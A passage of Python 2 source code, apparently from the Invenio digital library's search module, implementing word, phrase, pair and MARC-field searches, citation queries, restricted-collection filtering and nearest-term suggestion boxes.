wildcard and span queries are being detected inside 'p'.
If CFG_WEBSEARCH_SYNONYM_KBRS is set and we are searching in
one of the indexes that has defined runtime synonym knowledge
base, then look up there and automatically enrich search
results with results for synonyms.
In case the wildcard limit (wl) is greater than 0 and this limit
is reached an InvenioWebSearchWildcardLimitError will be raised.
In case you want to call this function with no limit for the
wildcard queries, wl should be 0.
Parameter 'ignore_synonyms' is a list of terms for which we
should not try to further find a synonym.
This function is suitable as a low-level API.
"""
## create empty output results set:
hitset = intbitset()
if not p: # sanity checking
return hitset
tokenizer = get_field_tokenizer_type(f)
hitset_cjk = intbitset()
if tokenizer == "BibIndexCJKTokenizer":
if is_there_any_CJK_character_in_text(p):
cjk_tok = BibIndexCJKTokenizer()
chars = cjk_tok.tokenize_for_words(p)
for char in chars:
hitset_cjk |= search_unit_in_bibwords(char, f, m, wl)
## eventually look up runtime synonyms:
hitset_synonyms = intbitset()
if CFG_WEBSEARCH_SYNONYM_KBRS.has_key(f):
if ignore_synonyms is None:
ignore_synonyms = []
ignore_synonyms.append(p)
for p_synonym in get_synonym_terms(p,
CFG_WEBSEARCH_SYNONYM_KBRS[f][0],
CFG_WEBSEARCH_SYNONYM_KBRS[f][1]):
if p_synonym != p and \
not p_synonym in ignore_synonyms:
hitset_synonyms |= search_unit(p_synonym, f, m, wl,
ignore_synonyms)
## look up hits:
if f == 'fulltext' and get_idx_indexer('fulltext') == 'SOLR' and CFG_SOLR_URL:
# redirect to Solr
try:
return search_unit_in_solr(p, f, m)
except:
# There were troubles with getting full-text search
# results from Solr. Let us alert the admin of these
# problems and let us simply return empty results to the
# end user.
register_exception()
return hitset
elif f == 'fulltext' and get_idx_indexer('fulltext') == 'XAPIAN' and CFG_XAPIAN_ENABLED:
# redirect to Xapian
try:
return search_unit_in_xapian(p, f, m)
except:
# There were troubles with getting full-text search
# results from Xapian. Let us alert the admin of these
# problems and let us simply return empty results to the
# end user.
register_exception()
return hitset
if f == 'datecreated':
hitset = search_unit_in_bibrec(p, p, 'c')
elif f == 'datemodified':
hitset = search_unit_in_bibrec(p, p, 'm')
elif f == 'refersto':
# we are doing search by the citation count
hitset = search_unit_refersto(p)
elif f == 'rawref':
from invenio.refextract_api import search_from_reference
field, pattern = search_from_reference(p)
return search_unit(pattern, field)
elif f == 'citedby':
# we are doing search by the citation count
hitset = search_unit_citedby(p)
elif f == 'collection':
# we are doing search by the collection name or MARC field
hitset = search_unit_collection(p, m, wl=wl)
elif m == 'a' or m == 'r':
# we are doing either phrase search or regexp search
if f == 'fulltext':
# FIXME: workaround for not having phrase index yet
return search_pattern(None, p, f, 'w')
index_id = get_index_id_from_field(f)
if index_id != 0:
if m == 'a' and index_id in get_idxpair_field_ids():
#for exact match on the admin configured fields we are searching in the pair tables
hitset = search_unit_in_idxpairs(p, f, m, wl)
else:
hitset = search_unit_in_idxphrases(p, f, m, wl)
else:
hitset = search_unit_in_bibxxx(p, f, m, wl)
# if not hitset and m == 'a' and (p[0] != '%' and p[-1] != '%'):
# #if we have no results by doing exact matching, do partial matching
# #for removing the distinction between simple and double quotes
# hitset = search_unit_in_bibxxx('%' + p + '%', f, m, wl)
elif p.startswith("cited:"):
# we are doing search by the citation count
hitset = search_unit_by_times_cited(p[6:])
else:
# we are doing bibwords search by default
hitset = search_unit_in_bibwords(p, f, m, wl=wl)
## merge synonym results and return total:
hitset |= hitset_synonyms
hitset |= hitset_cjk
return hitset
def get_idxpair_field_ids():
"""Returns the list of ids for the fields that idxPAIRS should be used on"""
index_dict = dict(run_sql("SELECT name, id FROM idxINDEX"))
return [index_dict[field] for field in index_dict if field in CFG_WEBSEARCH_IDXPAIRS_FIELDS]
def search_unit_in_bibwords(word, f, m=None, decompress=zlib.decompress, wl=0):
"""Searches for 'word' inside bibwordsX table for field 'f' and returns hitset of recIDs."""
set = intbitset() # will hold output result set
set_used = 0 # not-yet-used flag, to be able to circumvent set operations
limit_reached = 0 # flag for knowing if the query limit has been reached
# if no field is specified, search in the global index.
f = f or 'anyfield'
index_id = get_index_id_from_field(f)
if index_id:
bibwordsX = "idxWORD%02dF" % index_id
stemming_language = get_index_stemming_language(index_id)
else:
return intbitset() # word index f does not exist
# wash 'word' argument and run query:
if f.endswith('count') and word.endswith('+'):
# field count query of the form N+ so transform N+ to N->99999:
word = word[:-1] + '->99999'
word = string.replace(word, '*', '%') # we now use '*' as the truncation character
words = string.split(word, "->", 1) # check for span query
if len(words) == 2:
word0 = re_word.sub('', words[0])
word1 = re_word.sub('', words[1])
if stemming_language:
word0 = lower_index_term(word0)
word1 = lower_index_term(word1)
word0 = stem(word0, stemming_language)
word1 = stem(word1, stemming_language)
word0_washed = wash_index_term(word0)
word1_washed = wash_index_term(word1)
if f.endswith('count'):
# field count query; convert to integers in order
# to have numerical behaviour for 'BETWEEN n1 AND n2' query
try:
word0_washed = int(word0_washed)
word1_washed = int(word1_washed)
except ValueError:
pass
try:
res = run_sql_with_limit("SELECT term,hitlist FROM %s WHERE term BETWEEN %%s AND %%s" % bibwordsX,
(word0_washed, word1_washed), wildcard_limit = wl)
except InvenioDbQueryWildcardLimitError, excp:
res = excp.res
limit_reached = 1 # set the limit reached flag to true
else:
if f == 'journal':
pass # FIXME: quick hack for the journal index
else:
word = re_word.sub('', word)
if stemming_language:
word = lower_index_term(word)
word = stem(word, stemming_language)
if string.find(word, '%') >= 0: # do we have wildcard in the word?
if f == 'journal':
# FIXME: quick hack for the journal index
# FIXME: we can run a sanity check here for all indexes
res = ()
else:
try:
res = run_sql_with_limit("SELECT term,hitlist FROM %s WHERE term LIKE %%s" % bibwordsX,
(wash_index_term(word),), wildcard_limit = wl)
except InvenioDbQueryWildcardLimitError, excp:
res = excp.res
limit_reached = 1 # set the limit reached flag to true
else:
res = run_sql("SELECT term,hitlist FROM %s WHERE term=%%s" % bibwordsX,
(wash_index_term(word),))
# fill the result set:
for word, hitlist in res:
hitset_bibwrd = intbitset(hitlist)
# add the results:
if set_used:
set.union_update(hitset_bibwrd)
else:
set = hitset_bibwrd
set_used = 1
#check to see if the query limit was reached
if limit_reached:
#raise an exception, so we can print a nice message to the user
raise InvenioWebSearchWildcardLimitError(set)
# okay, return result set:
return set
def search_unit_in_idxpairs(p, f, type, wl=0):
"""Searches for pair 'p' inside idxPAIR table for field 'f' and
returns hitset of recIDs found."""
limit_reached = 0 # flag for knowing if the query limit has been reached
do_exact_search = True # flag to know when it makes sense to try to do exact matching
result_set = intbitset()
#determine the idxPAIR table to read from
index_id = get_index_id_from_field(f)
if not index_id:
return intbitset()
stemming_language = get_index_stemming_language(index_id)
pairs_tokenizer = BibIndexDefaultTokenizer(stemming_language)
idxpair_table_washed = wash_table_column_name("idxPAIR%02dF" % index_id)
if p.startswith("%") and p.endswith("%"):
p = p[1:-1]
original_pattern = p
p = string.replace(p, '*', '%') # we now use '*' as the truncation character
queries_releated_vars = [] # contains tuples of (query_addons, query_params, use_query_limit)
#is it a span query?
ps = string.split(p, "->", 1)
if len(ps) == 2 and not (ps[0].endswith(' ') or ps[1].startswith(' ')):
#so we are dealing with a span query
pairs_left = pairs_tokenizer.tokenize_for_pairs(ps[0])
pairs_right = pairs_tokenizer.tokenize_for_pairs(ps[1])
if not pairs_left or not pairs_right:
# we are not actually dealing with pairs but with words
return search_unit_in_bibwords(original_pattern, f, type, wl)
elif len(pairs_left) != len(pairs_right):
# it is kind of hard to know what the user actually wanted
# we have to do: foo bar baz -> qux xyz, so let's swith to phrase
return search_unit_in_idxphrases(original_pattern, f, type, wl)
elif len(pairs_left) > 1 and \
len(pairs_right) > 1 and \
pairs_left[:-1] != pairs_right[:-1]:
# again we have something like: foo bar baz -> abc xyz qux
# so we'd better switch to phrase
return search_unit_in_idxphrases(original_pattern, f, type, wl)
else:
# finally, we can treat the search using idxPairs
# at this step we have either: foo bar -> abc xyz
# or foo bar abc -> foo bar xyz
queries_releated_vars = [("BETWEEN %s AND %s", (pairs_left[-1], pairs_right[-1]), True)]
for pair in pairs_left[:-1]:# which should be equal with pairs_right[:-1]
queries_releated_vars.append(("= %s", (pair, ), False))
do_exact_search = False # no exact search for span queries
elif string.find(p, '%') > -1:
#tokenizing p will remove the '%', so we have to make sure it stays
replacement = 'xxxxxxxxxx' #hopefuly this will not clash with anything in the future
p = string.replace(p, '%', replacement)
pairs = pairs_tokenizer.tokenize_for_pairs(p)
if not pairs:
# we are not actually dealing with pairs but with words
return search_unit_in_bibwords(original_pattern, f, type, wl)
queries_releated_vars = []
for pair in pairs:
if string.find(pair, replacement) > -1:
pair = string.replace(pair, replacement, '%') #we replace back the % sign
queries_releated_vars.append(("LIKE %s", (pair, ), True))
else:
queries_releated_vars.append(("= %s", (pair, ), False))
do_exact_search = False
else:
#normal query
pairs = pairs_tokenizer.tokenize_for_pairs(p)
if not pairs:
# we are not actually dealing with pairs but with words
return search_unit_in_bibwords(original_pattern, f, type, wl)
queries_releated_vars = []
for pair in pairs:
queries_releated_vars.append(("= %s", (pair, ), False))
first_results = 1 # flag to know if it's the first set of results or not
for query_var in queries_releated_vars:
query_addons = query_var[0]
query_params = query_var[1]
use_query_limit = query_var[2]
if use_query_limit:
try:
res = run_sql_with_limit("SELECT term, hitlist FROM %s WHERE term %s" \
% (idxpair_table_washed, query_addons), query_params, wildcard_limit=wl) #kwalitee:disable=sql
except InvenioDbQueryWildcardLimitError, excp:
res = excp.res
limit_reached = 1 # set the limit reached flag to true
else:
res = run_sql("SELECT term, hitlist FROM %s WHERE term %s" \
% (idxpair_table_washed, query_addons), query_params) #kwalitee:disable=sql
if not res:
return intbitset()
for pair, hitlist in res:
hitset_idxpairs = intbitset(hitlist)
if first_results:
result_set = hitset_idxpairs
first_results = 0
else:
result_set.intersection_update(hitset_idxpairs)
#check to see if the query limit was reached
if limit_reached:
#raise an exception, so we can print a nice message to the user
raise InvenioWebSearchWildcardLimitError(result_set)
# check if we need to eliminate the false positives
if CFG_WEBSEARCH_IDXPAIRS_EXACT_SEARCH and do_exact_search:
# we need to eliminate the false positives
idxphrase_table_washed = wash_table_column_name("idxPHRASE%02dR" % index_id)
not_exact_search = intbitset()
for recid in result_set:
res = run_sql("SELECT termlist FROM %s WHERE id_bibrec %s" %(idxphrase_table_washed, '=%s'), (recid, )) #kwalitee:disable=sql
if res:
termlist = deserialize_via_marshal(res[0][0])
if not [term for term in termlist if term.lower().find(p.lower()) > -1]:
not_exact_search.add(recid)
else:
not_exact_search.add(recid)
# remove the recs that are false positives from the final result
result_set.difference_update(not_exact_search)
return result_set
def search_unit_in_idxphrases(p, f, type, wl=0):
"""Searches for phrase 'p' inside idxPHRASE*F table for field 'f' and returns hitset of recIDs found.
The search type is defined by 'type' (e.g. equals to 'r' for a regexp search)."""
# call word search method in some cases:
if f.endswith('count'):
return search_unit_in_bibwords(p, f, wl=wl)
set = intbitset() # will hold output result set
set_used = 0 # not-yet-used flag, to be able to circumvent set operations
limit_reached = 0 # flag for knowing if the query limit has been reached
use_query_limit = False # flag for knowing if to limit the query results or not
# deduce in which idxPHRASE table we will search:
idxphraseX = "idxPHRASE%02dF" % get_index_id_from_field("anyfield")
if f:
index_id = get_index_id_from_field(f)
if index_id:
idxphraseX = "idxPHRASE%02dF" % index_id
else:
return intbitset() # phrase index f does not exist
# detect query type (exact phrase, partial phrase, regexp):
if type == 'r':
query_addons = "REGEXP %s"
query_params = (p,)
use_query_limit = True
else:
p = string.replace(p, '*', '%') # we now use '*' as the truncation character
ps = string.split(p, "->", 1) # check for span query:
if len(ps) == 2 and not (ps[0].endswith(' ') or ps[1].startswith(' ')):
query_addons = "BETWEEN %s AND %s"
query_params = (ps[0], ps[1])
use_query_limit = True
else:
if string.find(p, '%') > -1:
query_addons = "LIKE %s"
query_params = (p,)
use_query_limit = True
else:
query_addons = "= %s"
query_params = (p,)
# special washing for fuzzy author index:
if f in ('author', 'firstauthor', 'exactauthor', 'exactfirstauthor', 'authorityauthor'):
query_params_washed = ()
for query_param in query_params:
query_params_washed += (wash_author_name(query_param),)
query_params = query_params_washed
# perform search:
if use_query_limit:
try:
res = run_sql_with_limit("SELECT term,hitlist FROM %s WHERE term %s" % (idxphraseX, query_addons),
query_params, wildcard_limit=wl)
except InvenioDbQueryWildcardLimitError, excp:
res = excp.res
limit_reached = 1 # set the limit reached flag to true
else:
res = run_sql("SELECT term,hitlist FROM %s WHERE term %s" % (idxphraseX, query_addons), query_params)
# fill the result set:
for word, hitlist in res:
hitset_bibphrase = intbitset(hitlist)
# add the results:
if set_used:
set.union_update(hitset_bibphrase)
else:
set = hitset_bibphrase
set_used = 1
#check to see if the query limit was reached
if limit_reached:
#raise an exception, so we can print a nice message to the user
raise InvenioWebSearchWildcardLimitError(set)
# okay, return result set:
return set
def search_unit_in_bibxxx(p, f, type, wl=0):
"""Searches for pattern 'p' inside bibxxx tables for field 'f' and returns hitset of recIDs found.
The search type is defined by 'type' (e.g. equals to 'r' for a regexp search)."""
# call word search method in some cases:
if f == 'journal' or f.endswith('count'):
return search_unit_in_bibwords(p, f, wl=wl)
p_orig = p # saving for eventual future 'no match' reporting
limit_reached = 0 # flag for knowing if the query limit has been reached
use_query_limit = False # flag for knowing if to limit the query results or not
query_addons = "" # will hold additional SQL code for the query
query_params = () # will hold parameters for the query (their number may vary depending on TYPE argument)
# wash arguments:
f = string.replace(f, '*', '%') # replace truncation char '*' in field definition
if type == 'r':
query_addons = "REGEXP %s"
query_params = (p,)
use_query_limit = True
else:
p = string.replace(p, '*', '%') # we now use '*' as the truncation character
ps = string.split(p, "->", 1) # check for span query:
if len(ps) == 2 and not (ps[0].endswith(' ') or ps[1].startswith(' ')):
query_addons = "BETWEEN %s AND %s"
query_params = (ps[0], ps[1])
use_query_limit = True
else:
if string.find(p, '%') > -1:
query_addons = "LIKE %s"
query_params = (p,)
use_query_limit = True
else:
query_addons = "= %s"
query_params = (p,)
# construct 'tl' which defines the tag list (MARC tags) to search in:
tl = []
if len(f) >= 2 and str(f[0]).isdigit() and str(f[1]).isdigit():
tl.append(f) # 'f' seems to be okay as it starts by two digits
else:
# deduce desired MARC tags on the basis of chosen 'f'
tl = get_field_tags(f)
if not tl:
# f index does not exist, nevermind
pass
# okay, start search:
l = [] # will hold list of recID that matched
for t in tl:
# deduce into which bibxxx table we will search:
digit1, digit2 = int(t[0]), int(t[1])
bx = "bib%d%dx" % (digit1, digit2)
bibx = "bibrec_bib%d%dx" % (digit1, digit2)
# construct and run query:
if t == "001":
if query_addons.find('BETWEEN') > -1 or query_addons.find('=') > -1:
# verify that the params are integers (to avoid returning record 123 when searching for 123foo)
try:
query_params = tuple(int(param) for param in query_params)
except ValueError:
return intbitset()
if use_query_limit:
try:
res = run_sql_with_limit("SELECT id FROM bibrec WHERE id %s" % query_addons,
query_params, wildcard_limit=wl)
except InvenioDbQueryWildcardLimitError, excp:
res = excp.res
limit_reached = 1 # set the limit reached flag to true
else:
res = run_sql("SELECT id FROM bibrec WHERE id %s" % query_addons,
query_params)
else:
query = "SELECT bibx.id_bibrec FROM %s AS bx LEFT JOIN %s AS bibx ON bx.id=bibx.id_bibxxx WHERE bx.value %s" % \
(bx, bibx, query_addons)
if len(t) != 6 or t[-1:]=='%':
# wildcard query, or only the beginning of field 't'
# is defined, so add wildcard character:
query += " AND bx.tag LIKE %s"
query_params_and_tag = query_params + (t + '%',)
else:
# exact query for 't':
query += " AND bx.tag=%s"
query_params_and_tag = query_params + (t,)
if use_query_limit:
try:
res = run_sql_with_limit(query, query_params_and_tag, wildcard_limit=wl)
except InvenioDbQueryWildcardLimitError, excp:
res = excp.res
limit_reached = 1 # set the limit reached flag to true
else:
res = run_sql(query, query_params_and_tag)
# fill the result set:
for id_bibrec in res:
if id_bibrec[0]:
l.append(id_bibrec[0])
# check no of hits found:
nb_hits = len(l)
# okay, return result set:
set = intbitset(l)
#check to see if the query limit was reached
if limit_reached:
#raise an exception, so we can print a nice message to the user
raise InvenioWebSearchWildcardLimitError(set)
return set
def search_unit_in_solr(p, f=None, m=None):
"""
Query a Solr index and return an intbitset corresponding
to the result. Parameters (p,f,m) are usual search unit ones.
"""
if m and (m == 'a' or m == 'r'): # phrase/regexp query
if p.startswith('%') and p.endswith('%'):
p = p[1:-1] # fix for partial phrase
p = '"' + p + '"'
return solr_get_bitset(f, p)
def search_unit_in_xapian(p, f=None, m=None):
"""
Query a Xapian index and return an intbitset corresponding
to the result. Parameters (p,f,m) are usual search unit ones.
"""
if m and (m == 'a' or m == 'r'): # phrase/regexp query
if p.startswith('%') and p.endswith('%'):
p = p[1:-1] # fix for partial phrase
p = '"' + p + '"'
return xapian_get_bitset(f, p)
def search_unit_in_bibrec(datetext1, datetext2, type='c'):
"""
Return hitset of recIDs found that were either created or modified
(according to 'type' arg being 'c' or 'm') from datetext1 until datetext2, inclusive.
Does not pay attention to pattern, collection, anything. Useful
to intersect later on with the 'real' query.
"""
set = intbitset()
if type and type.startswith("m"):
type = "modification_date"
else:
type = "creation_date" # by default we are searching for creation dates
parts = datetext1.split('->')
if len(parts) > 1 and datetext1 == datetext2:
datetext1 = parts[0]
datetext2 = parts[1]
if datetext1 == datetext2:
res = run_sql("SELECT id FROM bibrec WHERE %s LIKE %%s" % (type,),
(datetext1 + '%',))
else:
res = run_sql("SELECT id FROM bibrec WHERE %s>=%%s AND %s<=%%s" % (type, type),
(datetext1, datetext2))
for row in res:
set += row[0]
return set
def search_unit_by_times_cited(p):
"""
Return histset of recIDs found that are cited P times.
Usually P looks like '10->23'.
"""
numstr = '"'+p+'"'
#this is sort of stupid but since we may need to
#get the records that do _not_ have cites, we have to
#know the ids of all records, too
#but this is needed only if bsu_p is 0 or 0 or 0->0
allrecs = []
if p == 0 or p == "0" or \
p.startswith("0->") or p.endswith("->0"):
allrecs = intbitset(run_sql("SELECT id FROM bibrec"))
return get_records_with_num_cites(numstr, allrecs)
def search_unit_refersto(query):
"""
Search for records satisfying the query (e.g. author:ellis) and
return list of records referred to by these records.
"""
if query:
ahitset = search_pattern(p=query)
if ahitset:
return get_refersto_hitset(ahitset)
else:
return intbitset([])
else:
return intbitset([])
def search_unit_citedby(query):
"""
Search for records satisfying the query (e.g. author:ellis) and
return list of records cited by these records.
"""
if query:
ahitset = search_pattern(p=query)
if ahitset:
return get_citedby_hitset(ahitset)
else:
return intbitset([])
else:
return intbitset([])
def search_unit_collection(query, m, wl=None):
"""
Search for records satisfying the query (e.g. collection:"BOOK" or
collection:"Books") and return list of records in the collection.
"""
if len(query):
ahitset = get_collection_reclist(query)
if not ahitset:
return search_unit_in_bibwords(query, 'collection', m, wl=wl)
return ahitset
else:
return intbitset([])
def get_records_that_can_be_displayed(user_info,
hitset_in_any_collection,
current_coll=CFG_SITE_NAME,
colls=None):
"""
Return records that can be displayed.
"""
records_that_can_be_displayed = intbitset()
if colls is None:
colls = [current_coll]
# let's get the restricted collections the user has rights to view
permitted_restricted_collections = user_info.get('precached_permitted_restricted_collections', [])
policy = CFG_WEBSEARCH_VIEWRESTRCOLL_POLICY.strip().upper()
current_coll_children = get_collection_allchildren(current_coll) # real & virtual
# add all restricted collections, that the user has access to, and are under the current collection
# do not use set here, in order to maintain a specific order:
# children of 'cc' (real, virtual, restricted), rest of 'c' that are not cc's children
colls_to_be_displayed = [coll for coll in current_coll_children if coll in colls or coll in permitted_restricted_collections]
colls_to_be_displayed.extend([coll for coll in colls if coll not in colls_to_be_displayed])
if policy == 'ANY':# the user needs to have access to at least one collection that restricts the records
#we need this to be able to remove records that are both in a public and restricted collection
permitted_recids = intbitset()
notpermitted_recids = intbitset()
for collection in restricted_collection_cache.cache:
if collection in permitted_restricted_collections:
permitted_recids |= get_collection_reclist(collection)
else:
notpermitted_recids |= get_collection_reclist(collection)
records_that_can_be_displayed = hitset_in_any_collection - (notpermitted_recids - permitted_recids)
else:# the user needs to have access to all collections that restrict a records
notpermitted_recids = intbitset()
for collection in restricted_collection_cache.cache:
if collection not in permitted_restricted_collections:
notpermitted_recids |= get_collection_reclist(collection)
records_that_can_be_displayed = hitset_in_any_collection - notpermitted_recids
if records_that_can_be_displayed.is_infinite():
# We should not return infinite results for user.
records_that_can_be_displayed = intbitset()
for coll in colls_to_be_displayed:
records_that_can_be_displayed |= get_collection_reclist(coll)
return records_that_can_be_displayed
def intersect_results_with_collrecs(req, hitset_in_any_collection, colls, ap=0, of="hb", verbose=0, ln=CFG_SITE_LANG, display_nearest_terms_box=True):
"""Return dict of hitsets given by intersection of hitset with the collection universes."""
_ = gettext_set_language(ln)
# search stage 4: intersect with the collection universe
if verbose and of.startswith("h"):
t1 = os.times()[4]
results = {} # all final results
results_nbhits = 0
# calculate the list of recids (restricted or not) that the user has rights to access and we should display (only those)
if not req or isinstance(req, cStringIO.OutputType): # called from CLI
user_info = {}
for coll in colls:
results[coll] = hitset_in_any_collection & get_collection_reclist(coll)
results_nbhits += len(results[coll])
records_that_can_be_displayed = hitset_in_any_collection
permitted_restricted_collections = []
else:
user_info = collect_user_info(req)
# let's get the restricted collections the user has rights to view
if user_info['guest'] == '1':
permitted_restricted_collections = []
## For guest users that are actually authorized to some restricted
## collection (by virtue of the IP address in a FireRole rule)
## we explicitly build the list of permitted_restricted_collections
for coll in colls:
if collection_restricted_p(coll) and (acc_authorize_action(user_info, 'viewrestrcoll', collection=coll)[0] == 0):
permitted_restricted_collections.append(coll)
else:
permitted_restricted_collections = user_info.get('precached_permitted_restricted_collections', [])
# let's build the list of the both public and restricted
# child collections of the collection from which the user
# started his/her search. This list of children colls will be
# used in the warning proposing a search in that collections
try:
current_coll = req.argd['cc'] # current_coll: coll from which user started his/her search
except:
from flask import request
current_coll = request.args.get('cc', CFG_SITE_NAME) # current_coll: coll from which user started his/her search
current_coll_children = get_collection_allchildren(current_coll) # real & virtual
# add all restricted collections, that the user has access to, and are under the current collection
# do not use set here, in order to maintain a specific order:
# children of 'cc' (real, virtual, restricted), rest of 'c' that are not cc's children
colls_to_be_displayed = [coll for coll in current_coll_children if coll in colls or coll in permitted_restricted_collections]
colls_to_be_displayed.extend([coll for coll in colls if coll not in colls_to_be_displayed])
records_that_can_be_displayed = get_records_that_can_be_displayed(
user_info,
hitset_in_any_collection,
current_coll, colls)
for coll in colls_to_be_displayed:
results[coll] = results.get(coll, intbitset()).union_update(records_that_can_be_displayed & get_collection_reclist(coll))
results_nbhits += len(results[coll])
if results_nbhits == 0:
# no hits found, try to search in Home and restricted and/or hidden collections:
results = {}
results_in_Home = records_that_can_be_displayed & get_collection_reclist(CFG_SITE_NAME)
results_in_restricted_collections = intbitset()
results_in_hidden_collections = intbitset()
for coll in permitted_restricted_collections:
if not get_coll_ancestors(coll): # hidden collection
results_in_hidden_collections.union_update(records_that_can_be_displayed & get_collection_reclist(coll))
else:
results_in_restricted_collections.union_update(records_that_can_be_displayed & get_collection_reclist(coll))
# in this way, we do not count twice, records that are both in Home collection and in a restricted collection
total_results = len(results_in_Home.union(results_in_restricted_collections))
if total_results > 0:
# some hits found in Home and/or restricted collections, so propose this search:
if of.startswith("h") and display_nearest_terms_box:
url = websearch_templates.build_search_url(req.argd, cc=CFG_SITE_NAME, c=[])
len_colls_to_display = len(colls_to_be_displayed)
# trim the list of collections to first two, since it might get very large
write_warning(_("No match found in collection %(x_collection)s. Other collections gave %(x_url_open)s%(x_nb_hits)d hits%(x_url_close)s.") %\
{'x_collection': '<em>' + \
string.join([get_coll_i18nname(coll, ln, False) for coll in colls_to_be_displayed[:2]], ', ') + \
(len_colls_to_display > 2 and ' et al' or '') + '</em>',
'x_url_open': '<a class="nearestterms" href="%s">' % (url),
'x_nb_hits': total_results,
'x_url_close': '</a>'}, req=req)
# display the hole list of collections in a comment
if len_colls_to_display > 2:
write_warning("<!--No match found in collection <em>%(x_collection)s</em>.-->" %\
{'x_collection': string.join([get_coll_i18nname(coll, ln, False) for coll in colls_to_be_displayed], ', ')},
req=req)
else:
# no hits found, either user is looking for a document and he/she has not rights
# or user is looking for a hidden document:
if of.startswith("h") and display_nearest_terms_box:
if len(results_in_hidden_collections) > 0:
write_warning(_("No public collection matched your query. "
"If you were looking for a hidden document, please type "
"the correct URL for this record."), req=req)
else:
write_warning(_("No public collection matched your query. "
"If you were looking for a non-public document, please choose "
"the desired restricted collection first."), req=req)
if verbose and of.startswith("h"):
t2 = os.times()[4]
write_warning("Search stage 4: intersecting with collection universe gave %d hits." % results_nbhits, req=req)
write_warning("Search stage 4: execution took %.2f seconds." % (t2 - t1), req=req)
return results
def intersect_results_with_hitset(req, results, hitset, ap=0, aptext="", of="hb"):
"""Return intersection of search 'results' (a dict of hitsets
with collection as key) with the 'hitset', i.e. apply
'hitset' intersection to each collection within search
'results'.
If the final set is to be empty, and 'ap'
(approximate pattern) is true, and then print the `warningtext'
and return the original 'results' set unchanged. If 'ap' is
false, then return empty results set.
"""
if ap:
results_ap = copy.deepcopy(results)
else:
results_ap = {} # will return empty dict in case of no hits found
nb_total = 0
final_results = {}
for coll in results.keys():
final_results[coll] = results[coll].intersection(hitset)
nb_total += len(final_results[coll])
if nb_total == 0:
if of.startswith("h"):
write_warning(aptext, req=req)
final_results = results_ap
return final_results
def create_similarly_named_authors_link_box(author_name, ln=CFG_SITE_LANG):
"""Return a box similar to ``Not satisfied...'' one by proposing
author searches for similar names. Namely, take AUTHOR_NAME
and the first initial of the firstame (after comma) and look
into author index whether authors with e.g. middle names exist.
Useful mainly for CERN Library that sometimes contains name
forms like Ellis-N, Ellis-Nick, Ellis-Nicolas all denoting the
same person. The box isn't proposed if no similarly named
authors are found to exist.
"""
# return nothing if not configured:
if CFG_WEBSEARCH_CREATE_SIMILARLY_NAMED_AUTHORS_LINK_BOX == 0:
return ""
# return empty box if there is no initial:
if re.match(r'[^ ,]+, [^ ]', author_name) is None:
return ""
# firstly find name comma initial:
author_name_to_search = re.sub(r'^([^ ,]+, +[^ ,]).*$', '\\1', author_name)
# secondly search for similar name forms:
similar_author_names = {}
for name in author_name_to_search, strip_accents(author_name_to_search):
for tag in get_field_tags("author"):
# deduce into which bibxxx table we will search:
digit1, digit2 = int(tag[0]), int(tag[1])
bx = "bib%d%dx" % (digit1, digit2)
bibx = "bibrec_bib%d%dx" % (digit1, digit2)
if len(tag) != 6 or tag[-1:]=='%':
# only the beginning of field 't' is defined, so add wildcard character:
res = run_sql("""SELECT bx.value FROM %s AS bx
WHERE bx.value LIKE %%s AND bx.tag LIKE %%s""" % bx,
(name + "%", tag + "%"))
else:
res = run_sql("""SELECT bx.value FROM %s AS bx
WHERE bx.value LIKE %%s AND bx.tag=%%s""" % bx,
(name + "%", tag))
for row in res:
similar_author_names[row[0]] = 1
# remove the original name and sort the list:
try:
del similar_author_names[author_name]
except KeyError:
pass
# thirdly print the box:
out = ""
if similar_author_names:
out_authors = similar_author_names.keys()
out_authors.sort()
tmp_authors = []
for out_author in out_authors:
nbhits = get_nbhits_in_bibxxx(out_author, "author")
if nbhits:
tmp_authors.append((out_author, nbhits))
out += websearch_templates.tmpl_similar_author_names(
authors=tmp_authors, ln=ln)
return out
def create_nearest_terms_box(urlargd, p, f, t='w', n=5, ln=CFG_SITE_LANG, intro_text_p=True):
"""Return text box containing list of 'n' nearest terms above/below 'p'
for the field 'f' for matching type 't' (words/phrases) in
language 'ln'.
Propose new searches according to `urlargs' with the new words.
If `intro_text_p' is true, then display the introductory message,
otherwise print only the nearest terms in the box content.
"""
# load the right message language
_ = gettext_set_language(ln)
if not CFG_WEBSEARCH_DISPLAY_NEAREST_TERMS:
return _("Your search did not match any records. Please try again.")
nearest_terms = []
if not p: # sanity check
p = "."
if p.startswith('%') and p.endswith('%'):
p = p[1:-1] # fix for partial phrase
index_id = get_index_id_from_field(f)
if f == 'fulltext':
if CFG_SOLR_URL:
return _("No match found, please enter different search terms.")
else:
# FIXME: workaround for not having native phrase index yet
t = 'w'
# special indexes:
if f == 'refersto':
return _("There are no records referring to %s.") % cgi.escape(p)
if f == 'citedby':
return _("There are no records cited by %s.") % cgi.escape(p)
# look for nearest terms:
if t == 'w':
nearest_terms = get_nearest_terms_in_bibwords(p, f, n, n)
if not nearest_terms:
return _("No word index is available for %s.") % \
('<em>' + cgi.escape(get_field_i18nname(get_field_name(f) or f, ln, False)) + '</em>')
else:
nearest_terms = []
if index_id:
nearest_terms = get_nearest_terms_in_idxphrase(p, index_id, n, n)
if f == 'datecreated' or f == 'datemodified':
nearest_terms = get_nearest_terms_in_bibrec(p, f, n, n)
if not nearest_terms:
nearest_terms = get_nearest_terms_in_bibxxx(p, f, n, n)
if not nearest_terms:
return _("No phrase index is available for %s.") % \
('<em>' + cgi.escape(get_field_i18nname(get_field_name(f) or f, ln, False)) + '</em>')
terminfo = []
for term in nearest_terms:
if t == 'w':
hits = get_nbhits_in_bibwords(term, f)
else:
if index_id:
hits = get_nbhits_in_idxphrases(term, f)
elif f == 'datecreated' or f == 'datemodified':
hits = get_nbhits_in_bibrec(term, f)
else:
hits = get_nbhits_in_bibxxx(term, f)
argd = {}
argd.update(urlargd)
# check which fields contained the requested parameter, and replace it.
for (px, fx) in ('p', 'f'), ('p1', 'f1'), ('p2', 'f2'), ('p3', 'f3'):
if px in argd:
argd_px = argd[px]
if t == 'w':
# p was stripped of accents, to do the same:
argd_px = strip_accents(argd_px)
#argd[px] = string.replace(argd_px, p, term, 1)
#we need something similar, but case insensitive
pattern_index = string.find(argd_px.lower(), p.lower())
if pattern_index > -1:
argd[px] = argd_px[:pattern_index] + term + argd_px[pattern_index+len(p):]
break
#this is doing exactly the same as:
#argd[px] = re.sub('(?i)' + re.escape(p), term, argd_px, 1)
#but is ~4x faster (2us vs. 8.25us)
terminfo.append((term, hits, argd))
intro = ""
if intro_text_p: # add full leading introductory text
if f:
